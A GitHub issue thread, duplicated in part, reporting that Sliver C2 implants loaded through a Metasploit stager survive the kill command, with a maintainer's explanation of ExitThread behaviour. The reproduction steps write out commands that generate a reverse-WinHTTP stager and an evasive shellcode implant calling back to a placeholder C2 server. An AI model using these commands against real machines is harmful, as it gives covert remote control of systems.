You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Describe the bug
Sending the kill command doesn't terminate the implant.
Looking at the target machine the process keeps running and it sends periodic ping to the C2 server. the sliver-server logs show connection attempts from an unregistered implant. The implant was generated as a shellcode and a metasploit stager was used to execute the payload.
To Reproduce
> msfconsole
use payload/windows/x64/custom/reverse_winhttp
set LHOST [SLIVER_SERVER_IP]
set LPORT 8443
set LURI home.woff
generate -f exe -o /tmp/index.exe
exit
Move index.exe to the target machine (i.e. Windows Server 2022)
sliver-server
profiles new --mtls [SLIVER_SERVER_IP]:8080 --format shellcode --evasion mtls-windows-shellcode
Use kill --force if you want to kill the host process. When running from a shellcode or a shared library, we call ExitThread instead of ExitProcess to avoid inadvertently killing the host process (in case the user injected in an already running process). This is by design.
There might be some incompatibilities between Donut and MSF stagers regarding calls to ExitThread which may cause the behavior you observed (implant still reaching out after a regular kill). I still need to figure that part out.
Describe the bug
Sending the
kill
command doesn't terminate the implant.Looking at the target machine the process keeps running and it sends periodic ping to the C2 server. the sliver-server logs show connection attempts from an unregistered implant. The implant was generated as a shellcode and a metasploit stager was used to execute the payload.
To Reproduce
> msfconsole
use payload/windows/x64/custom/reverse_winhttp
set LHOST [SLIVER_SERVER_IP]
set LPORT 8443
set LURI home.woff
generate -f exe -o /tmp/index.exe
exit
index.exe
to the target machine (i.e. Windows Server 2022)sliver-server
profiles new --mtls [SLIVER_SERVER_IP]:8080 --format shellcode --evasion mtls-windows-shellcode
stage-listener --url http://[SLIVER_SERVER_IP]:8443 --profile mtls-windows-shellcode --prepend-size
mtls -l 8080
use [SESSION_ID]
kill
Expected behavior
The implant should terminate when the C2 server sends the kill command
Screenshots
![Screenshot](https://private-user-images.githubusercontent.com/45320229/244170719-c1904374-142e-4d7b-8e99-8291f4bfff8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjExNjE5MzksIm5iZiI6MTcyMTE2MTYzOSwicGF0aCI6Ii80NTMyMDIyOS8yNDQxNzA3MTktYzE5MDQzNzQtMTQyZS00ZDdiLThlOTktODI5MWY0YmZmZjhhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzE2VDIwMjcxOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWFkYTQwMDEzOTU1NjI2MGQ0ZjUyMGI2NmM4OGEwNjQ5ODZkZDMyNGJlNDA3OTYyZWZjZmI2MTlmMjQzYjFjY2EmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.opAjXmqzTah1hmRUJ2jXxgwDvLzcmSAGefRXsJzTX7A)
Desktop (please complete the following information):
1.5.39
Additional context
none
The text was updated successfully, but these errors were encountered: